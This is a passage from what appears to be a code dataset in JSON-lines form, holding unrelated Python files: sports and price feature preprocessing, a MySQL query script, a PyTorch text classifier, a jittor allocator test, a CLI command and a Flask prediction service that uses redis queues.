sentiment\n reply_df = _sum_categorical_vader(reply_df, 'reply')\n topic_df = _sum_categorical_vader(topic_df, 'topic') \n\n # Set date as index for forum related dfs\n reply_df['date'] = pd.to_datetime(reply_df['date'])\n reply_df.index = pd.DatetimeIndex(reply_df['date'])\n reply_df = reply_df.drop(columns='date')\n\n topic_df['date'] = pd.to_datetime(topic_df['date'])\n topic_df.index = pd.DatetimeIndex(topic_df['date'])\n topic_df = topic_df.drop(columns='date')\n\n # Set 1 calendar day frequency, where missing data i completed with 0\n reply_df = reply_df.asfreq(freq='1D').fillna(fillna)\n topic_df = topic_df.asfreq(freq='1D').fillna(fillna)\n\n # Merge data frames\n dfs = [reply_df, topic_df]\n forum_related = _merge_frames(dfs, on='date')\n # forum_related['date'] = pd.to_datetime(forum_related['date'])\n\n # Merge data frames\n dfs = [price_df, transactions_df, forum_related]\n full_df = _merge_frames(dfs, on='date')\n\n # Sort by date\n full_df = full_df.sort_values(by='date')\n\n # Set today's label_headers' values as tomorrow's features\n for label in ['price', 'transactions']:\n full_df['today_' + label] = full_df[label].copy()\n\n # Binerize labels (price and transactions)\n full_df = _categorize_labels(full_df)\n\n # Set dates to index\n full_df.index = pd.DatetimeIndex(full_df['date'])\n full_df = full_df.drop(columns='date')\n\n return full_df\n\ndef _read_csv(file_path):\n try:\n df = pd.read_csv(file_path)\n except UnicodeDecodeError:\n df = pd.read_csv(file_path, encoding='latin1')\n \n return df\n\ndef _lower_headers(df):\n df.columns = map(str.lower, df.columns)\n\ndef _floaterize_prices(price_df):\n remove_comma = lambda text: text.replace(',', '')\n\n # price_df['open'] = price_df['open'].apply(remove_comma).astype(float)\n # price_df['close'] = price_df['close'].apply(remove_comma).astype(float)\n # price_df['high'] = price_df['high'].apply(remove_comma).astype(float)\n # price_df['low'] = price_df['low'].apply(remove_comma).astype(float)\n \n price_df['price'] = price_df['price'].apply(remove_comma).astype(float)\n\n return price_df\n\ndef _categorize_labels(df):\n labels = ['price', 'transactions']\n\n df[labels] = df[labels].diff().apply(np.sign)\n df[labels] = df[labels].replace(0, 
df[labels] = df[labels].replace(0, -1).astype(str).shift(-1)\n\n    df = df.dropna()\n\n    return df\n\ndef _transform_vader_series(df, header_suffix):\n    \"\"\"\n    Transform vader series of dataframe to categorical vader series.\n    \"\"\"\n\n    categorical_vader = list(zip(*df['vader'].map(_categorize_vader)))\n\n    categorical_columns = _get_categorical_vader(header_suffix)\n\n    for index, header in enumerate(categorical_columns):\n        df[header] = categorical_vader[index]\n\n    return df\n\ndef _categorize_vader(score):\n    \"\"\"\n    Transform vader score into one of the following categorical values:\n    - Very negative\n    - Negative\n    - Neutral\n    - Positive\n    - Very positive\n\n    Returns a tuple with 5 positions (one for each category)\n    where one element contains 1 and the others are 0.\n    \"\"\"\n    if score < -0.6:\n        # Very negative\n        return (1, 0, 0, 0, 0)\n    elif score < -0.2:\n        # Negative\n        return (0, 1, 0, 0, 0)\n    elif score < 0.2:\n        # Neutral\n        return (0, 0, 1, 0, 0)\n    elif score < 0.6:\n        # Positive\n        return (0, 0, 0, 1, 0)\n    else:\n        # Very positive\n        return (0, 0, 0, 0, 1)\n\ndef _drop_inplace(df, columns):\n    df.drop(columns, inplace=True, axis=1)\n\ndef _fold_categorical_vader(df, header_suffix, by=None, agg={}):\n    agg_type = {}\n    categorical_columns = _get_categorical_vader(header_suffix)\n    \n    for header in categorical_columns:\n        agg_type[header] = 'sum'\n\n    for column, type_ in agg.items():\n        agg_type[column] = type_\n\n    return df.groupby(by).agg(agg_type).reset_index()\n\ndef _sum_categorical_vader(df, header_suffix):\n    categorical_columns = _get_categorical_vader(header_suffix)\n    df['total_' + header_suffix] = df[categorical_columns].sum(axis=1)\n    return df\n\ndef _get_categorical_vader(header_suffix):\n    very_negative = 'very_negative_' + header_suffix\n    negative = 'negative_' + header_suffix\n    neutral = 'neutral_' + header_suffix\n    positive = 'positive_' + header_suffix\n    very_positive = 'very_positive_' + header_suffix\n\n    return [very_negative, negative, neutral, positive, very_positive]\n\ndef _merge_frames(dfs, on=None):\n    return reduce(lambda left,right: pd.merge(left,right,on=on), dfs)","sub_path":"forecaster/retriever.py","file_name":"retriever.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"132555033","text":"#!/usr/bin/python3\n\"\"\"A script that lists all cities of a given state from the database\"\"\"\n\n# connect to database\n# db = MySQLdb.connect(host=MY_HOST, user=MY_USER, passwd=MY_PASS, db=MY_DB)\nif __name__ == \"__main__\":\n    import MySQLdb\n    from sys import argv\n    db = MySQLdb.connect(host=\"localhost\",\n                         port=3306, user=argv[1], passwd=argv[2],\n                         db=argv[3], charset=\"utf8\")\n    # set cursor\n    cur = db.cursor()\n    # execute query - requires SQL\n    cur.execute(\"SELECT cities.name\\\n                 FROM cities INNER JOIN states\\\n                 ON cities.state_id = states.id\\\n                 WHERE states.name LIKE %s\\\n                 ORDER BY cities.name ASC\", (argv[4],))\n    # query parameters are passed as a tuple, hence the trailing comma in (argv[4],)\n    # request all or all remaining rows of results as tuples\n    query_rows = cur.fetchall()\n    list_length = len(query_rows)\n    for x in range(list_length):\n        if x < list_length - 1:\n            print(query_rows[x][0], end=\", \")\n        else:\n            print(query_rows[x][0])\n    # release cursor\n    cur.close()\n    # disconnect from database\n    
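# note: the loop above could also be written as: print(\", \".join(row[0] for row in query_rows))\n    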
db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9900767","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport math\nimport re\nimport pickle\nimport random\n\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\nfrom sklearn import preprocessing\n\ndef init_feature_vector():\n\tdir = \"../data/\"\n\tdetailed_results = str(dir)+\"RegularSeasonDetailedResults.csv\"\n\n\tdata = {}\n\tlocation = {\"H\": 1, \"N\": 0, \"A\": -1}\n\twith open(detailed_results) as fi:\n\t\theader = fi.readline().rstrip('\\r\\n').split(',')\n\n\t\t#c = 0\n\t\tfor lines in fi:\n\t\t\t'''c += 1\n\t\t\tif (c == 4616): # 4616 for 2003 data\n\t\t\t\tbreak'''\n\n\t\t\t# Parse the line\n\t\t\tl = lines.rstrip('\\r\\n').split(',')\n\t\t\t#print(len(lineinfo))\n\n\t\t\tseason = l[0]\n\t\t\tday_num = l[1]\n\t\t\tw_team = l[2]\n\t\t\tw_score = int(l[3])\n\t\t\tl_team = l[4]\n\t\t\tl_score = int(l[5])\n\t\t\tw_loc = l[6]\n\t\t\t#numot = l[7]\n\n\t\t\t# Init for new keys\n\t\t\tif season not in data:\n\t\t\t\tdata[season] = {}\n\t\t\tif w_team not in data[season]:\n\t\t\t\tdata[season][w_team] = {\"total_score\": 0, \"loc_sum\": 0, \"num_games\": 0, \"game_results\": [], \"end_streak\": 0, \"max_streak\": 0, \"total_def_reb\": 0, \"total_off_reb\": 0, \"total_num_plays\": 0}\n\t\t\tif l_team not in data[season]:\n\t\t\t\tdata[season][l_team] = {\"total_score\": 0, \"loc_sum\": 0, \"num_games\": 0, \"game_results\": [], \"end_streak\": 0, \"max_streak\": 0, \"total_def_reb\": 0, \"total_off_reb\": 0, \"total_num_plays\": 0}\n\n\t\t\t# Standard metrics for winning team\n\t\t\tdata[season][w_team][\"total_score\"] += w_score\n\t\t\tdata[season][w_team][\"loc_sum\"] += location[w_loc]\n\t\t\tdata[season][w_team][\"num_games\"] += 1\n\t\t\tdata[season][w_team][\"game_results\"].append(1)\n\t\t\tdata[season][w_team][\"end_streak\"] += 1\n\t\t\tdata[season][w_team][\"max_streak\"] = max(data[season][w_team][\"max_streak\"], data[season][w_team][\"end_streak\"])\n\n\t\t\t# Standard metrics for losing team\n\t\t\tdata[season][l_team][\"total_score\"] += l_score\n\t\t\tdata[season][l_team][\"loc_sum\"] += -location[w_loc]\n\t\t\tdata[season][l_team][\"num_games\"] += 1\n\t\t\tdata[season][l_team][\"game_results\"].append(-1)\n\t\t\tdata[season][l_team][\"end_streak\"] = 0\n\n\t\t\tnum_features = 13\n\t\t\tfor i in range(8, 21):\n\t\t\t\tif header[i] not in data[season][w_team]:\n\t\t\t\t\tdata[season][w_team][header[i]] = 0\n\t\t\t\tif header[i] not in data[season][l_team]:\n\t\t\t\t\tdata[season][l_team][header[i]] = 0\n\n\t\t\t\tdata[season][w_team][header[i]] += int(l[i])\n\t\t\t\tdata[season][l_team][header[i]] += int(l[i+num_features])\n\n\t\t\t# Winning team additional metrics\n\t\t\tdata[season][w_team][\"total_def_reb\"] += float(data[season][w_team][\"dr\"]) / (data[season][w_team][\"dr\"] + data[season][l_team][\"or\"])\n\t\t\tdata[season][w_team][\"total_off_reb\"] += float(data[season][w_team][\"or\"]) / (data[season][w_team][\"or\"] + data[season][l_team][\"dr\"])\n\t\t\t#data[season][w_team][\"total_num_plays\"] = data[season][w_team][\"blk\"] + data[season][w_team][\"stl\"] + data[season][w_team][\"or\"] + data[season][w_team][\"dr\"]\n\n\t\t\t# Losing team additional metrics\n\t\t\tdata[season][l_team][\"total_def_reb\"] += float(data[season][l_team][\"dr\"]) / 
(data[season][l_team][\"dr\"] + data[season][w_team][\"or\"])\n\t\t\tdata[season][l_team][\"total_off_reb\"] += float(data[season][l_team][\"or\"]) / (data[season][l_team][\"or\"] + data[season][w_team][\"dr\"])\n\t\t\t#data[season][w_team][\"total_num_plays\"] = data[season][w_team][\"blk\"] + data[season][w_team][\"stl\"] + data[season][w_team][\"or\"] + data[season][w_team][\"dr\"]\n\n\t\t\t#print(\"Season = %s\\t| W_team = %s\\t| L_team = %s\" % (lineinfo[0], lineinfo[2],lineinfo[4]))\n\n\treturn data, header\n\ndef add_vector_averages(data, header):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor feat in header[8:21]:\n\t\t\t\tnew_feature = \"avg_\"+feat\n\t\t\t\ttotal_val = data[season][team][feat]\n\n\t\t\t\tdata[season][team][new_feature] = float(total_val)/num_games\n\n\t\t\t# Average Scores\n\t\t\ttotal_score = data[season][team][\"total_score\"]\n\t\t\tdata[season][team][\"avg_score\"] = total_score / num_games\n\n\t\t\t# Average rebound percentage\n\t\t\tdata[season][team][\"avg_off_reb_percentage\"] = data[season][team][\"total_off_reb\"] / float(num_games)\n\t\t\tdata[season][team][\"avg_def_reb_percentage\"] = data[season][team][\"total_def_reb\"] / float(num_games)\n\n\treturn data\n\ndef add_seeds(data):\n\tseed_data = \"../data/TourneySeeds.csv\"\n\n\twith open(seed_data, \"r\") as fi:\n\t\tnext(fi)\n\t\tfor line in fi:\n\t\t\tseason, seed_string, team = line.rstrip('\\n').split(\",\")\n\t\t\tseed = 1 / float(re.findall('\\d+', seed_string)[0])\n\n\t\t\tif int(season) < 2003:\n\t\t\t\tcontinue\n\n\t\t\t#print(\"Season: %s\\t| seed: %s\\t| team: %s\" % (season, seed, team))\n\n\t\t\tdata[season][team][\"seed_string\"] = seed_string\n\t\t\tdata[season][team][\"bracket_seed\"] = seed\n\n\treturn data\n\ndef add_momentum(data, decay_rate):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tdata[season][team][\"momentum\"] = 0\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor i in range(len(data[season][team][\"game_results\"])):\n\t\t\t\tdecay_t = num_games - i\n\t\t\t\tgame_result = data[season][team][\"game_results\"][i]\n\n\t\t\t\tdata[season][team][\"momentum\"] += game_result * np.exp(-decay_t * decay_rate)\n\n\treturn data\n\ndef add_percentages(data):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tdata[season][team][\"win_percentage\"] = 0\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor i in range(len(data[season][team][\"game_results\"])):\n\t\t\t\tgame_result = data[season][team][\"game_results\"][i]\n\n\t\t\t\tif game_result == 1:\n\t\t\t\t\tdata[season][team][\"win_percentage\"] += 1\n\n\t\t\tdata[season][team][\"win_percentage\"] /= float(num_games)\n\n\t\t\t##\n\t\t\tdata[season][team][\"fg_percentage\"] = data[season][team][\"fgm\"] / float(data[season][team][\"fga\"])\n\t\t\tdata[season][team][\"fg3_percentage\"] = data[season][team][\"fgm3\"] / float(data[season][team][\"fga3\"])\n\t\t\tdata[season][team][\"ft_percentage\"] = data[season][team][\"ftm\"] / float(data[season][team][\"fta\"])\n\n\treturn data\n\ndef decay_test(data):\n\tfor decay_rate in decay_rates:\n\n\t\tdata = add_momentum(data, decay_rate)\n\n\t\tx = []\n\t\ty = []\n\t\tfor team in data[\"2003\"]:\n\t\t\tx.append(team)\n\t\t\ty.append(data[\"2003\"][team][\"momentum\"])\n\n\t\tplt.scatter(x, y)\n\t\tplt.title(\"Decay Rate: %s\" % (decay_rate))\n\t\tplt.savefig(\"decay_rate_\"+str(decay_rate)+\".png\")\n\t\tplt.show()\n\ndef print_feature(feat):\n\tfor season in 
data:\n\t\tfor team in data[season]:\n\t\t\tprint(\"Season: %s\\t| Team: %s\\t| %s: %s\" % (season, team, feat, data[season][team][feat]))\n\ndef load_data():\n\tdata = pickle.load(open(\"pickled_files/data.p\", \"rb\"))\n\treturn data\n\ndef dump_data(data):\n\tpickle.dump(data, open(\"pickled_files/data.p\", \"wb\"))\n\ndef feature_vectorizor(data, feature_list):\n\tfeature_vec = {}\n\tnormalize_vec = []\n\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tfor feature in feature_list:\n\t\t\t\tif season not in feature_vec:\n\t\t\t\t\tfeature_vec[season] = {}\n\t\t\t\tif team not in feature_vec[season]:\n\t\t\t\t\tfeature_vec[season][team] = []\n\n\t\t\t\tif feature not in data[season][team]:\n\t\t\t\t\t#print(\"data['%s']['%s']: has no %s\" % (season, team, feature))\n\t\t\t\t\tfeature_vec[season][team].append(-1)\n\t\t\t\telse:\n\t\t\t\t\tfeature_vec[season][team].append(data[season][team][feature])\n\n\t\t\tnormalize_vec.append(feature_vec[season][team])\n\n\t# Normalize\n\tfeatures_normalized = preprocessing.normalize(normalize_vec)\n\n\ti = 0\n\t#print(\"Total [season][team]: %s\\t| feature_vec: %s\" % (len(data)*len(data[\"2003\"]), len(features_normalized)))\n\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tfeature_vec[season][team] = features_normalized[i]\n\t\t\ti += 1\n\n\treturn feature_vec\n\ndef training_tuples(filename):\n\n\tresults = []\n\twith open(filename, \"r\") as fi:\n\t\tnext(fi)\n\n\t\tfor lines in fi:\n\t\t\t# Parse the line\n\t\t\tl = lines.rstrip('\\n').split(',')\n\t\t\t#print(len(lineinfo))\n\n\t\t\tseason = l[0]\n\t\t\tday_num = l[1]\n\t\t\tw_team = l[2]\n\t\t\tw_score = int(l[3])\n\t\t\tl_team = l[4]\n\t\t\tl_score = int(l[5])\n\n\t\t\tif random.random() < 0.5:\n\t\t\t\tresults.append((season, w_team, l_team, 1))\n\t\t\telse:\n\t\t\t\tresults.append((season, l_team, w_team, 0))\n\n\treturn results\n\ndecay_rates = [1, 1.1, 1.2, 1.3, 1.4, 1.5]\n\nfeature_list = ['avg_def_reb_percentage', 'avg_score', 'avg_fgm3', 'avg_dr', 'avg_fga3', 'avg_off_reb_percentage', 'end_streak', 'avg_stl', 'avg_ast', 'fg_percentage', 'avg_or', 'momentum', 'avg_fgm', 'fg3_percentage', 'avg_fga', 'win_percentage', 'num_games', 'avg_blk', 'avg_ftm', 'avg_fta', 'max_streak', 'ft_percentage', 'avg_to', 'avg_pf', 'bracket_seed']\n\n\ndata, header = init_feature_vector()\n#data = load_data()\n\ndata = add_vector_averages(data, header)\ndata = add_momentum(data, decay_rates[3])\ndata = add_percentages(data)\ndata = add_seeds(data)\n\ndump_data(data)\nprint(data[\"2004\"][\"1104\"])\n\nfeature_vec = feature_vectorizor(data, feature_list)\n#feature_vec = pickle.load(open(\"pickled_files/normalized_feature_vec.p\"))\n\npickle.dump(feature_vec, open(\"pickled_files/decay_True_normalized_feature_vec.p\", \"wb\"))\n\nseason_file = \"../data/RegularSeasonDetailedResults.csv\"\nresults = training_tuples(season_file)\n#results = pickle.load(open(\"pickled_files/season_tuples.p\"))\n\npickle.dump(results, open(\"pickled_files/season_tuples.p\", \"wb\"))\n# print(results)\nprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n\nbracket_file = \"../data/TourneyDetailedResults.csv\"\nresults = training_tuples(bracket_file)\n#results = pickle.load(open(\"pickled_files/bracket_tuples.p\"))\n\npickle.dump(results, open(\"pickled_files/bracket_tuples.p\", \"wb\"))\n# print(results)\n\n#for i in range(len(feature_list)):\n\t#print(\"%s:\\t%s\" % (feature_list[i], 
feature_vec[\"2003\"][\"1104\"][i]))\n","sub_path":"AdaBoost/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12159496","text":"import os\nimport sys\nimport torch\nfrom torch.serialization import save\nfrom torch.serialization import load\nimport string\nfrom random import shuffle\n\nfrom datasearch import *\nfrom stringhash import str2bigramhashlist\nfrom stringhash import str2unigramhashlist\n\n\n# No pre-trained word embedding\n# No negative sampling.\n# No subsampling.\n# Use hash value to get the index of the word.\n# classify NL string to upper-class python documents.\n\n\n# Constants and Hyperparameters\n_C = {}\n_C['DEBUG_MODE'] = False\n_C['LAB_SERVER_USE'] = True\n_C['LAB_SERVER_USE_GPU_NUM'] = \"03\"\n# If ITER_COUNT_DEBUG_INFO_PERIOD <= 0, program will not print losses.\n_C['ITER_COUNT_DEBUG_INFO_PERIOD'] = 1000\n# If TRAIN_CONTENTNUM_UPPER_LIMIT <= 0, program will learn for the whole training set.\n_C['TRAIN_CONTENTNUM_UPPER_LIMIT'] = 0\n\n_C['HASH_BIT_SIZE'] = 18\n_C['DIMENSION'] = 64\n_C['LEARNING_RATE'] = 0.01\n_C['EPOCH'] = 5\n\n_C['W_IN_FILENAME'] = 'result_r/zerobase_learned_full_r_4_w_in.pt'\n_C['W_OUT_FILENAME'] = 'result_r/zerobase_learned_full_r_4_w_out.pt'\n\n\ndef print_constants_to_str():\n # input : void\n # output : string s\n s = ''\n for key in _C:\n s += str(key) + '\\t: ' + str(_C[key]) + '\\n'\n return s\n\n\ndef get_gradient(input_hash, output_class, W_in, W_out):\n # input_hash : int\n # output_class : int. It should be the value between [0, K], the value K is from the W_out's shape.\n # W_in : torch.tensor((2 ** HASH_BIT_SIZE), D)\n # W_out : torch.tensor(K, D)\n\n # loss : torch.tensor(1)\n # grad_in : torch.tensor(1, D)\n # grad_out : torch.tensor(K, D)\n\n _, D = W_in.size()\n inputVector = W_in[input_hash]\n out = W_out.mm(inputVector.view(D, 1))\n\n expout = torch.exp(out)\n softmax = expout / expout.sum()\n loss = -torch.log(softmax[output_class])\n\n grad = softmax\n grad[output_class] -= 1.0\n\n grad_in = grad.view(1, -1).mm(W_out)\n grad_out = grad.mm(inputVector.view(1, -1))\n\n return loss, grad_in, grad_out\n\n\ndef train_one_content(input_string, output_classes, W_in, W_out, learning_rate=_C['LEARNING_RATE']):\n # INPUTS\n # input_string : string (all content)\n # output_classes : int list. Each of them should be the value between [0, K], the value K is from the W_out's shape.\n # W_in : torch.tensor((2 ** HASH_BIT_SIZE), D)\n # W_out : torch.tensor(K, D)\n\n # OUTPUTS\n # avg_loss : float. 
average loss recorded while learning.\n    # W_in (learned)\n    # W_out (learned)\n\n    losses = []\n    inputhashlist = str2unigramhashlist(input_string, _C['HASH_BIT_SIZE'])\n    # print('PROFILING INFO : len(output_classes) * len(inputhashlist) = ' +\n    #       str(len(output_classes) * len(inputhashlist)))\n    for output_class in output_classes:\n        for h in inputhashlist:\n            L, G_in, G_out = get_gradient(h, output_class, W_in, W_out)\n            # I don't know why the squeeze is needed here, and I haven't tested whether it works without it.\n            losses.append(L.item())\n            W_in[h] -= learning_rate * G_in.squeeze()\n            W_out -= learning_rate * G_out\n\n    avg_loss = 0\n    if len(losses) != 0:\n        avg_loss = sum(losses) / len(losses)\n\n    return avg_loss, W_in, W_out\n\n\ndef main():\n    # GPU setting\n    if _C['LAB_SERVER_USE']:\n        # Set GPU number to use\n        os.environ[\"CUDA_VISIBLE_DEVICES\"] = _C['LAB_SERVER_USE_GPU_NUM']\n\n    dimension = _C['DIMENSION']\n    iter_count_debug_info_period = _C['ITER_COUNT_DEBUG_INFO_PERIOD']\n\n    print(print_constants_to_str())\n\n    # Xavier initialization of weight matrices\n    W_in = torch.randn((1 << _C['HASH_BIT_SIZE']),\n                       dimension).cuda() / (dimension**0.5)\n    W_out = torch.randn(len(num2upperpydoc), dimension).cuda() / (dimension**0.5)\n\n    # LEARNING\n    print('Collect all training filenames.')\n    obj3_filenamelist = obj3_allfilelist()\n    iter_count = 0\n    avglosses = []\n    print('Training Start.')\n    for epoch in range(_C['EPOCH']):\n        print(\"EPOCH \" + str(epoch))\n        shuffle(obj3_filenamelist)\n        for filename in obj3_filenamelist:\n            iter_count += 1\n            if _C['TRAIN_CONTENTNUM_UPPER_LIMIT'] > 0 and _C['TRAIN_CONTENTNUM_UPPER_LIMIT'] < iter_count:\n                break\n\n            content, answers = obj3_readfile(filename, isupperpydocused=True)\n\n            # train title\n            lastfilename = obj3_getdistinctfilename(filename)\n            _, W_in, W_out = train_one_content(\n                lastfilename, answers, W_in, W_out, learning_rate=_C['LEARNING_RATE'])\n\n            # train content\n            avgloss, W_in, W_out = train_one_content(\n                content, answers, W_in, W_out, learning_rate=_C['LEARNING_RATE'])\n\n            avglosses.append(avgloss)\n            if (iter_count_debug_info_period > 0) and (iter_count % iter_count_debug_info_period == 0):\n                print(\"Content Iteration : \" + str(iter_count))\n                if len(avglosses) != 0:\n                    print(\"LOSS : %f\" % (sum(avglosses)/len(avglosses),))\n                else:\n                    print(\"LOSS : N/A\")\n                avglosses = []\n\n                sys.stdout.flush()\n\n    # SAVE W_in W_out to file.\n    save(W_in, _C['W_IN_FILENAME'])\n    save(W_out, _C['W_OUT_FILENAME'])\n\n\nif not _C['DEBUG_MODE']:\n    main()\n","sub_path":"PyMaker/learning/train_zerobase_r.py","file_name":"train_zerobase_r.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"336229454","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/cjld/new_jittor/jittor/python/jittor/test/test_allocator2.py\n# Compiled at: 2020-03-20 04:44:53\n# Size of source mod 2**32: 1519 bytes\nimport unittest, jittor as jt, gc\n\ndef test(h, w, total_alloc_call, total_alloc_byte, total_free_call=0, total_free_byte=0):\n    jt.clean()\n    jt.gc()\n    with jt.flag_scope(use_stat_allocator=1):\n        a = jt.random([h, w])\n        b = a + a\n        c = a * b\n        c.data\n        del a\n        del b\n        del c\n        gc.collect()\n        x = (\n         jt.flags.stat_allocator_total_alloc_call,\n         jt.flags.stat_allocator_total_alloc_byte,\n         jt.flags.stat_allocator_total_free_call,\n         
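# the four counters are packed into one tuple so a single assert compares them all at once\n         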
jt.flags.stat_allocator_total_free_byte)\n y = (\n total_alloc_call, total_alloc_byte, total_free_call, total_free_byte)\n assert x == y, (x, y)\n\n\nclass TestAllocator2(unittest.TestCase):\n\n def test_stat(self):\n test(10, 10, 1, 1048576)\n test(100, 100, 1, 1048576)\n test(1000, 1000, 1, 20971520)\n test(8000, 1000, 2, 67108864)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/jittor-1.0.0.tar/test_allocator2.cpython-37.py","file_name":"test_allocator2.cpython-37.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284186256","text":"import click\nfrom sys import exit\nfrom wasabi import Printer\nfrom ..utils import get_action_metadata\nfrom ..client.pretty import pretty_print_yaml\n\nmsg = Printer()\n\n\n@click.command(name=\"show\")\n@click.argument(\"action_name\", nargs=-1, required=True)\ndef cmd_show(action_name):\n \"\"\" Show examples for an action\"\"\"\n action_name = \" \".join(action_name)\n try:\n action = get_action_metadata(action_name, \"show\")\n except ModuleNotFoundError:\n msg.fail(f\"No action module available for action name '{action_name}'\")\n print(\"You can get the list of available actions with:\")\n print(\"\\topenpipe help\")\n exit(2)\n print(\"### Pipeline Examples\")\n pretty_print_yaml(action[\"test_filename\"])\n print(\"### End Of Pipeline Examples\")\n","sub_path":"openpipe/cli/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"607919077","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport configparser\nimport warnings\nfrom argparse import ArgumentParser\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport sys\nimport logging\nfrom flask import Flask, render_template, request, abort, redirect, url_for, session, jsonify, make_response\nfrom flask_cors import CORS\nfrom wtforms import Form, TextField\nfrom datetime import datetime\nimport json\nimport pandas as pd\n\napp = Flask(__name__)\napp.app_context().push()\napp.secret_key = 'secret'\nlogger = app.logger\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.DEBUG)\napp.debug = True\nlogger.name = 'data_predict'\nCORS(app)\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nlogging.basicConfig(filename=config['DATA']['LOG_PATH'], filemode='a', format='%(name)s - %(levelname)s - %(message)s')\n\nfrom predictive_maintenance.PredictValue import predict_value\npredict_value = predict_value()\nimport os\nimport redis\nfrom rq import Queue\n\nr = redis.Redis()\nq_high = Queue('high', connection=r)\nq_mid = Queue('mid', connection=r)\nq_low = Queue('low', connection=r)\nq_default = Queue('default', connection=r)\n\nmodel1 = config['DATA']['MODEL1']\nmodel2 = config['DATA']['MODEL2']\ninput_folder = config['DATA']['input_fl']\noutput_foler = config['DATA']['output_fl']\ntimeout= config['DATA']['JOB_TIMEOUT']\n\ndef to_float(val):\n try:\n return float(val)\n except ValueError:\n return None\n except TypeError:\n return None\n\n\n@app.route(\"/data_predict\", methods=['GET', 'POST'])\ndef get_predict_data():\n start = datetime.now()\n \n header = None\n url = request.url\n status = 0\n \n try:\n modelname = request.args.get(\"modelname\")\n header = modelname\n filename = request.args.get(\"filename\")\n priority = int(request.args.get(\"priority\"))\n except Exception as ex:\n 
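# request.args.get returns None for missing parameters, so absent or non-numeric values land here\n        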
response = jsonify({'error_code': 400, \n 'error_msg':'missing parameters'})\n return make_response((response))\n\n out_path = os.path.join(output_foler,\"{0}_predictions_{1}\".format(modelname, filename))\n try: \n \n inputfile_path = os.path.join(input_folder,filename) \n df = pd.read_csv(inputfile_path, na_values=['?'])\n \n df.index = df['curveNb']\n X_test = df.drop(labels=['curveNb','2P_yearMonth'], axis=1) \n \n if priority == 1: \n job = q_high.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to high queue at {job.enqueued_at}\")\n \n elif priority == 2: \n job = q_mid.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to mid queue at {job.enqueued_at}\") \n \n elif priority == 3: \n job = q_low.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to low queue at {job.enqueued_at}\") \n\n else: \n job = q_default.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to default queue at {job.enqueued_at}\") \n \n status = 200\n except KeyError as ex:\n msg = {'error_code':404,\n 'error_message':'{}'.format(ex)}\n except Exception as ex:\n msg = {'error_code':520,\n 'error_message':'{}'.format(ex)}\n\n if status == 200:\n msg = {'status_code': 200,\n 'status': 'SUCCESS' }\n else:\n msg = {'error_code': 400,\n 'error_message': msg }\n\n time_taken = (datetime.now() - start)\n logger.info('Request served')\n logger.info('time_taken: {}'.format(time_taken))\n\n response = {'status':msg,'url':url,'output file':os.path.basename(out_path)}\n logger.info(response)\n return jsonify({header:response})\n\n\n@app.route('/health_check', methods=['GET'])\ndef health_check():\n return make_response(('SUCCESS', 200))\n\n\nif __name__ == \"__main__\":\n config = configparser.ConfigParser()\n config.read('config.ini')\n default_port = int(config['DATA']['port'])\n parser = ArgumentParser(description='Pass Data')\n parser.add_argument('-p', '--port', default=default_port, help='port to listen on')\n args = parser.parse_args()\n app.run(\"0.0.0.0\", port=default_port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"141110694","text":"#Secret Word Game\n#author: R. 
